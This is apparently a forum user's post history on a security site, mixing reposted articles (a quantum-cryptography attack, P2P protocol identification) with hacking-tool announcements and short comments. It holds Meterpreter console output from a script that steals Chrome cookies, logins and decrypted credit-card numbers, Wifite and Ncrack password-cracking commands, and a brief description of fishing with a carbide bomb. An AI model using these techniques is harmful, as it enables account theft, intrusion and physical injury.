Posts: 3972
Days Won: 22
Everything posted by begood
-
The results were spectacular. 171 million names (100 million unique)
-
until recently you had the nick "homosexual" on this account; you were looked up.
-
try the serials2000 database ... I think it has over 10 million.
-
find out the IPs on which the executable was run. I don't care what method you use to do it.
-
the more a product costs and the more it is promoted, the more users want it. when it is released for free on the net, the boom comes => it gets maximum promotion. it's a marketing strategy. nothing more. I too could make a program and sell it for 5000 euros when it isn't worth even 20. I advertise as much as I can, people fall for it, then I pretend to crack it and post it on the net and send a few letters to some underground news sites => epic win. publicity galore.
-
I was reading http://rstcenter.com/forum/26064-encrypted-obfuscated-your-p2p-protocol-can-still-ided.rst and came across the document (PDF) in which the whole procedure was explained. On page 10 I see a familiar name: Luigi Auriemma. In short, what the "program" does (it is a single dll): it stores all the traffic generated by a program in a .pcap file (Wireshark). And that with just one dll that has to be placed in the same folder as the executable we want to analyse. *You need to have winpcap installed. Luigi Auriemma personal note: I assume it uses dll hijacking. Later edit: yes, I was right
-
It's apparent that the physics lexicon has been dragged kicking and screaming out of the 19th century with a recent paper published in Nature Photonics titled "Hacking commercial quantum cryptography systems by tailored bright illumination." I never thought I would live to see the word "hacking" used in its proper context in a physics paper. But enough about physics lingo. What about the quantum encryption hacks alluded to by the title? What we have is another paper demonstrating that the weak point of quantum encryption systems is the point where classical meets quantum. This is not the first hack of its kind, but, it is, in true hacker tradition, the first focused on a commercial system. Quantum key distribution makes use of the laws of physics to provide a guaranteed level of security. Boiled down to its essential components, quantum systems must be measured to determine their state. In making the measurement, the system is forced into a certain state. An eavesdropper cannot listen in on a quantum communication without everyone else on the line knowing that someone is getting the goods on them. It's security heaven: the walls may have ears, but in the quantum world, they are fluorescent pink and scream I CAN HEAR YOU. This vision of security nirvana breaks down when you consider that the act of measurement, at some point, involves taking a quantum property and making it classical. At that point, vulnerabilities creep into the system. In the work of Lydersen and coworkers, the point of attack is precisely that: the photodiodes used to detect light. In quantum cryptographic systems, the quantum part is transferred in packets that consist of just a single photon. Photons, being kind of low on energy, are hard to detect, but there's a type of photodiode called an "avalanche photodiode" that is pretty good at it. In these photodiodes, a section of material has a voltage applied across it, giving it a large electric field. 
When the photon hits the photodiode, the material loses an electron. The field grabs hold of the electron and accelerates it, and, like every good drunk driver, the electron collides, freeing up more electrons. This sets off a chain reaction, where a single photon generates a large number of electrons that can be recorded as a click. Avalanche photodiodes are not without their problems. Less than half of absorbed photons actually set off an avalanche, and, quite often, avalanches occur even when no photon is around to trigger them—these spurious clicks are called dark counts. Engineers get around the dark count problem by lowering the voltage and preventing avalanches until they expect a photon. There isn't much you can do about the detector not seeing every photon, except to know that the problem exists and keep sending photons until enough bits have been received. It is precisely these two properties that are used to listen in on quantum key distribution. This is how the attack works. Eve—the eternal villain in security—gets in between Alice and Bob. Her first task is to get control over Bob's photodiodes. To do this, she sends a short light pulse along with a small amount of light that stays on all the time. The short pulse looks like a dark count and triggers the photodiode to switch the accelerating field off to stop the avalanche, while the continuous light field keeps the accelerating field off. Now Bob can't detect single photons, nor does he get dark counts, but, if a sufficiently intense light pulse hits his photodiodes, he will think he has seen a single photon. Eve is now ready to steal the key. When Alice sends her single photons to Bob to create a private key, Eve imitates Bob and intercepts all of the photons. As she measures each photon, she resends the results of her measurement, not as a single photon, but as a bright light pulse. 
Bob, unaware of Eve, is randomly choosing from a set of measurements and then making that measurement on the light pulse. There are two possible choices here: he chooses the same measurement that Eve chose, or he chooses a different measurement. If Bob chooses to make the same measurement as Eve, then Eve's light pulse ends up falling on a single photodetector, and, since it is bright, it makes that detector go click. If Bob chooses to make a different measurement, Eve's pulse gets split up so only half falls on each detector. The light is no longer bright enough to make either detector go click. The upshot is that Bob ends up with identical results to Eve, but half the measurements get thrown away, and Eve doesn't know which half. You might think that would be a problem, but remember, the detectors don't always click anyway. Eve doesn't get every photon that Alice sends, and Bob doesn't get every bright pulse that Eve sends, but the whole system is rather inefficient anyway. Bob can never be absolutely sure how good his connection with Alice is, so Alice just keeps sending photons until Bob finally tells her to stop. Every other step of the process is done in open classical communication, in which Eve can, well, eavesdrop on with ease. From Alice and Bob's open chatter, Eve can match her results with Bob's and from there it's game over. End result: Eve has an identical key to Bob and Alice. So, how do you get around this? It's going to be difficult, because every solution involves interfering with the photodiode and making it less efficient. One could periodically divert the light to a non-amplified photodiode to check for the presence of a continuous light beam. Or one might be able to play with the amplification of the photodiode to try and distinguish a continuous light field from dark counts. But no matter what, it is pretty clear that quantum key distribution has only changed the playground, but not the game played between hackers and cryptographers. 
Quantum key distribution in superposition of "insecure" and "unneeded"
-
Typical Web traffic is easy enough to spot: it uses TCP port 80. But plenty of protocols prefer to remain in the shadows and purposely make themselves difficult to identify—including Skype, BitTorrent, and eMule. If easy to identify, such protocols might make a tempting target for ISPs seeking to throttle back certain kinds of traffic. However, even these "obfuscated" protocols have a hard time hiding their secrets; encrypting the traffic can't keep them hidden, nor can certain tunneling behaviors that try to disguise one sort of traffic as another.

Who wants to identify traffic that hopes to remain hidden? Vendors of traffic analysis hardware, for one, who sell their gear to ISPs and must first be able to classify traffic before doing anything useful with it. Deep packet inspection hardware, which can look inside the payload of individual packets, can be thwarted with even light encryption. But vendors have long ago figured out how to identify protocols even when they don't want to be identified, and even when the data is encrypted.

There are different ways of doing this, but the most common relies on various arcane statistical measurements: how a protocol negotiates a handshake between a server and client, how it exchanges encryption keys, packet sizes, the order of packet arrivals, etc. Crafting a protocol that has no such distinct identifying characteristics is very, very hard, in part because vendors don't publicize their identification techniques; even when deep packet inspection engines are open-sourced, the truly tricky bits tend to get left out.

A pair of Swedish security experts recently released a new paper to remind us just how difficult good protocol obfuscation can be. "Breaking and Improving Protocol Obfuscation," (PDF) by Erik Hjelmvik and Wolfgang John, was written for Chalmers University of Technology and Sweden's Internet Infrastructure Foundation. It shows in detail how the authors were able to routinely identify obfuscated protocols like BitTorrent, Skype, and eMule.

But Hjelmvik and John aren't out to produce better identification tools. No, their goal is to show the weaknesses in current obfuscated protocols in order to make those protocols better. If the protocols can't be identified, then ISPs can't do much to interfere with them. "The purpose with [sic] our research is not to reinforce active filtering of P2P traffic on the Internet," they write. "Instead we want to support the concept of network neutrality by providing feedback to the creators of obfuscated protocols. As we have observed, the supposed-to-be-obfuscated protocols are not obfuscated enough to avoid statistical identification of various properties specific to the protocols."

In the paper, the authors show how an open source tool can be trained to reliably pick out encrypted, proprietary, and obfuscated protocols with more than 90 percent accuracy. (Skype proved most difficult to reliably identify.) To better hide their protocols, designers need to do more than encrypt payloads; they must pay attention to obscuring any unique flow properties as well, using tools like random padding of packets, randomized flushing of the datastream, and tricky techniques to randomize the direction of packet exchanges.

Call it the new protocol arms race. Hjelmvik and John are working to make tools like SPID (Statistical Protocol IDentification) into lean, mean, traffic identification machines—but they're doing so only in order to push protocol designers to do a better job of obfuscating traffic.

Encrypted and obfuscated? Your P2P protocol can still be IDed
-
Microsoft and Facebook are in talks to further strengthen their search partnership, possibly resulting in Bing gaining access to anonymized data generated by Facebook users to better personalize its search results, according to anonymous sources cited by All Things Digital. Microsoft would be able to use the information from Facebook's Like buttons, which the social giant has managed to have plastered all over the Web. When a user likes a webpage, their Facebook friends are notified; if this deal goes through, Microsoft would also be able to know which webpages users are appreciating, and would be able to work that into Bing's algorithms (it could be particularly useful for Bing News), instead of just relying on spiders scouring the Internet. With Facebook's 500 million users, such a deal could give it quite a boost over Google, which presumably would be excluded from the data. The sources did point out an important hurdle though: because of Facebook's many privacy issues, the possible expansion of the search relationship would only be able to encompass information which users have already agreed to make public. The deal works very well with Microsoft's strategy for social networking: partner rather than compete. "Nobody wants another Facebook," Dharmesh Mehta, Windows Live Director of Product Management, recently told Ars. Furthermore, Microsoft's strong relationship with Facebook is a thorn in Google's side, which benefits the two companies since they are both competing more and more with the search giant. The Microsoft-Facebook partnership has been a roller coaster ride so far which has included a $240 million investment from Microsoft, Live Search powering Facebook, Microsoft winning and then losing ad platform exclusivity for the site, and finally Bing search result integration. All Things Digital emphasizes there's no deal yet—the talks could fall apart. Both Microsoft and Facebook declined to comment on the report. 
Bing could get access to anonymized Facebook data
-
If you carry around BackTrack on a USB drive, you might as well take the BackBox for a spin. Yes, it does not have those many tools that the former LiveCD does, but given the time and effort, it will probably reach there. The BackBox is based on Ubuntu 10.04 Lucid Lynx, running a Linux kernel v2.6.32 with Xfce 4.6.1. It provides a complete desktop experience, coupled with a simplified usage of the system resources making it suitable in situations where speed is a crucial factor. BackBox is designed to be a useful and simple tool for Penetration Testing. It also supports themes such as – Thunar, GDM and the Plymouth theme. It contains the following applications and more: kismet, medusa, msf, nikto, nmap, skipfish, sqlmap, w3af, wireshark. This distro supports both – 32-bit and 64-bit operating systems! Download BackBox Linux 1 RC Download | BackBox Linux
-
Need to crack an MS RDP or SMB password? Ncrack 0.3ALPHA to the rescue! Visit Ncrack - High-speed network authentication cracker and thank @ithilgore! Twitter / Nmap Project: Need to crack an MS RDP or ... http://seclists.org/nmap-dev/2010/q3/697 This is the first "real" bruteforcer for RDP.
-
About two months ago, Jeremiah Grossman found a nice way to exploit the form autofill feature of the Safari browser to extract the stored data. A few days later Google announced that Chrome 6 will support form autofill including credit card information. I was curious how the data is stored and the metasploit project was missing a meterpreter script to extract chrome browser data anyway, so I created one.

The information is stored in sqlite databases and some JSON files. The script downloads these and extracts the useful information from the databases, storing the data in JSON dumps so it is both human readable and easy to parse. The most sensitive data (auto fill passwords and credit card numbers) is encrypted using the Windows function CryptProtectData: "Typically, only a user with the same logon credential as the user who encrypted the data can decrypt the data. In addition, the encryption and decryption usually must be done on the same computer."

To decrypt the data, the script calls the CryptUnprotectData function on the target system using the new railgun meterpreter extension. To make this work, the process on the target system running meterpreter needs to be owned by the user the data belongs to, so this does not work with SYSTEM privileges. To get the data of the currently logged on user, the script can automatically migrate into the explorer.exe process and, after the decryption is done, back into the original process.

The following shows the console output of the script:

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > run enum_chrome -m
[*] current PID is 1100. migrating into explorer.exe, PID=2916...
[*] done.
[*] running as user 'VM-WINXP\test'...
[*] extracting data for user 'test'...
[*] downloading file Web Data to '/home/sven/.msf3/logs/scripts/enum_chrome/10.1.1.11/20100920.2016/test/Web Data'...
[*] downloading file Cookies to '/home/sven/.msf3/logs/scripts/enum_chrome/10.1.1.11/20100920.2016/test/Cookies'...
[*] downloading file History to '/home/sven/.msf3/logs/scripts/enum_chrome/10.1.1.11/20100920.2016/test/History'...
[*] downloading file Login Data to '/home/sven/.msf3/logs/scripts/enum_chrome/10.1.1.11/20100920.2016/test/Login Data'...
[*] downloading file Bookmarks to '/home/sven/.msf3/logs/scripts/enum_chrome/10.1.1.11/20100920.2016/test/Bookmarks'...
[*] downloading file Preferences to '/home/sven/.msf3/logs/scripts/enum_chrome/10.1.1.11/20100920.2016/test/Preferences'...
[*] creating file 'autofill.json'...
[*] creating file 'autofill_profiles.json'...
[*] creating file 'autofill_credit_cards.json'...
[*] decrypting field 'card_number_encrypted'...
[*] creating file 'cookies.json'...
[*] creating file 'history.json'...
[*] creating file 'logins.json'...
[*] creating file 'bookmarks.json'...
[*] creating file 'preferences.json'...
[*] migrating back into PID=1100...
[*] done.
meterpreter >

The file 'autofill_credit_cards.json' contains the following (the field "card_number_encrypted_decrypted" gets added by the script):

[
  {
    "label": "",
    "verification_code_encrypted": "",
    "unique_id": 1,
    "expiration_year": 2010,
    "card_number": "",
    "shipping_address": "",
    "type": "",
    "card_number_encrypted": "\u0001\u0000\u0000\u0000Ð~L~]ß\u0001\u0015Ñ\u0011~Lz\u0000ÀOÂ~Wë\u0001\u0000\u0000\u0000/\u0006E\u000eú«}N~LÁ\u001bjÍ5\u0004~\\u0000\u0000\u0000\u0000\u0002\u0000\u0000\u0000\u0000\u0000\u0003f\u0000\u0000¨\u0000\u0000\u0000\u0010\u0000\u0000\u0000Ú½[~LökºíaÂAÕ\u0013ÖoÚ\u0000\u0000\u0000\u0000\u0004~@\u0000\u0000| \u0000\u0000\u0000\u0010\u0000\u0000\u0000~Eî\\uFÎrgé|i¬.\u0002~P~I\u0018\u0000\u0000\u0000~N£Hvß~FÃÀê%á6h¢Q~Q;j NØ\u0002m±\u0014\u0000\u0000\u0000Yö|#~\~A°µ±ù~Zå·®\u0007éJ~KyÓ",
    "billing_address": "",
    "expiration_month": 12,
    "verification_code": "",
    "name_on_card": "Test Card",
    "card_number_encrypted_decrypted": "0123456789012345"
  }
]

You can download the script here: metasploit/enum_chrome.rb at master from svent's misc - GitHub

Relentless Coding: Meterpreter Script to extract chrome browser data
-
"Running 64-bit Linux? Haven't updated yet? You're probably being rooted as I type this. CVE-2010-3081, this week's second high-profile local root exploit in the Linux kernel, is compromising machines left and right. Almost all 64-bit machines are affected, and 'Ac1db1tch3z' (classy) published code to let any local user get a root shell. Ac1db1tch3z's exploit is more malicious than usual because it leaves a backdoor behind for itself to exploit later even if the hole is patched. Luckily, there's a tool you can run to see if you've already been exploited, courtesy of security company Ksplice, which beat most of the Linux vendors with a 'rebootless' version of the patch." Slashdot Linux Story | Linux Kernel Exploit Busily Rooting 64-Bit Machines
-
Designed for Backtrack4 RC1 distribution of Ubuntu. Linux only; no windows or osx support. To attack multiple WEP and WPA encrypted networks at the same time. this tool is customizable to be automated with only a few arguments. can be trusted to run without supervision.

Features of Wifite.
- sorts targets by power (in dB); cracks closest access points first
- all WPA handshakes are backed up (to wifite.py's working directory)
- mid-attack options: stop during attack with Ctrl+C to use (continue, move onto next target, skip to cracking, exit)
- numerous filters to specify exactly what to attack (wep/wpa/both, above certain signal strengths, channels, etc)
- very customizable settings (timeouts, packets/sec, etc)
- SKA support (untested)
- finds devices in monitor mode; if none are found, prompts for selection
- all passwords saved to log.txt
- switching WEP attacks does not reset IVS
- displays session summary at exit; shows any cracked keys

How to run
python wifite.py

Examples
./wifite.py -all –dict /pentest/passwords/wordlists/abc.lst
./wifite.py –power 50 -wepw 15 -pps 600

Most of us must be using backtrack for penetration testing and other technical audits for many applications and operating systems. Wifite is integrated in backtrack next release. Download Wifite Here or
wget -O wifite.py http://wifite.googlecode.com/svn/trunk/wifite.py
The above command can be used from any *nix system.

Wifite – mass wep and wpa cracker for backtrack4 ? PenTestIT
-
you've still got your little brain from childhood, that's why you don't hallucinate.
-
no shit? I think I'll come up with a few tutorials with and about improvised explosives and home-made poison.
-
bruteforce takes forever. it's absurd to ask that. it depends on how long and complex the password is. get yourself some wpa rainbow tables and crack with those, or "rent" some computers and run dictionaries. it's absurd to use bruteforce on wpa.
-
carbide bomb. you throw it and fish out the dead fish (their air bladder bursts) that will float to the surface. I gathered about 20 kg in an hour that way, in the mountains.
-
same shit. banned.
-
tineye.com is a kind of google for images. it can find similar images of different sizes (you search for a 100x100 pixel avatar, it finds you the wallpaper that was shrunk to those dimensions) and much more, the description is on the site.
-
Hacktivity 2010, the largest computer hackers' conference in eastern Europe, kicked off Saturday, with some 1,000 participants expected to attend the two-day event, according to organisers. The conference was to bring together officials and computer experts from Hungary and abroad in an informal setting, combining lectures and discussions on serious issues such as Internet security, with lighter fare and games. Bruce Schneier, a world-renowned cyber security expert, opened the congress with a keynote speech. Other well-known participants and lecturers included Alexander Kornbrust of Oracle, Robert Lipovsky from the ESET computer security company's laboratory in Bratislava, and US hacker Mitch Altman, who was organising a hardware workshop. Meanwhile, in the leisure zone, participants could test their ability to break into systems and take control of foreign computers in a variety of games, from "Hack the Vendor," to "Capture the Flag." More information about the event is available on the following Internet site: Hacktivity 1,000 computer hackers meet in Budapest
-
save the picture to your desktop and then upload it to TinEye Reverse Image Search. if you're lucky it finds you higher-resolution images
-
Managing your day-to-day life is not an easy job to do. There are so many things to concern for - housekeeping, shopping, children... And what about cousin's birthday you always forget or important phone numbers? Undoubtedly your working place is covered with dusty yellow (or blue, or pink) sticky notes. If so - PNotes is right for you. Throw the physical stickies away and replace them with virtual ones on your desktop. PNotes (Pinned Notes or Portable Notes, use what you prefer) is written entirely in C and Windows API (with Pelles C for Windows IDE) - so it is fast and light-weight. Ease of use - no installation, just unpack the downloaded archive to any location and run PNotes.exe. Formatting - format and design each note as you wish, using all the advantages of rich text formatting. Skins - there is a variety of skins for PNotes but if you wish, you can run the program in skinless mode, in which case you can stretch notes to any reasonable size. Transparency - you can set notes’ transparency level from opaque to fully transparent. If you enable this feature each note can have its own transparency level. Images - you can add images to notes, making them more expressive. Smilies - besides image files, the set of predefined smilies is at your disposal. Scheduling - use various schedule types to be reminded about significant events by many different ways. Using this feature you may just hide notes and don't worry, you'll be notified in time. Overdue notes tracking - stay alerted even with overdue reminders. Tags - add any number tags to each note for further searching and sorting. Password protection - prevents unauthorized access to program. Encryption - allows all your notes to be stored as encrypted files, so nobody could read their content, even in case you lose your USB stick. Control Panel - this is your central command post. All management is put into effect here. 
Groups - divide notes into groups of your choice, create new groups and subgroups, control all by mouse click or drag-and-drop. Diary group - special group of notes with its own settings, which allows you to maintain diary-like set. Docking - dock your notes to any side of the screen, forcing them always to be straightened and look like a panel. Searching - search for (or replace) text fragments in all notes, including hidden or in each separate note, or find notes with specified title. Favorites - access intensively used notes by a single click. Custom fonts - use your custom fonts which are not installed on current machine. E-mailing - send notes via e-mail as mail body text or as attachment to any target with PNotes running and open attached note on target machine. Recycle Bin - you decide how you want to delete the unneeded note: completely or send it to Recycle Bin with ability to restore it later. Backing up - you decide whether to make backup copies for changed notes and what is the deepness of backup levels. Internationalization - PNotes is fully Unicode supported and translated into many languages. Portability - PNotes does not require installation, it can be started from any drive (fixed or flash) and leaves no traces on host computer after finishing. Other features - of course there are many other unmentioned features in program, but I suggest you to discover them by yourself, these are delights of any new program, aren't they? I hope that you will enjoy using PNotes as I enjoy developing it! PNotes Portable | PortableApps.com - Portable software for USB drives PNotes PNotes //I "discovered" this program tonight, it's very, very useful.
-
it doesn't really manage to download a 350 mb .avi file for me, it gives me a blank page.
-
can you only do http proxy? an http tunnel would be superb. I think I'll start playing with this too. by the way, SSL works just as well! https://daat-proxy-rstcenter.appspot.com/rstcenter.com RC4 128bit encryption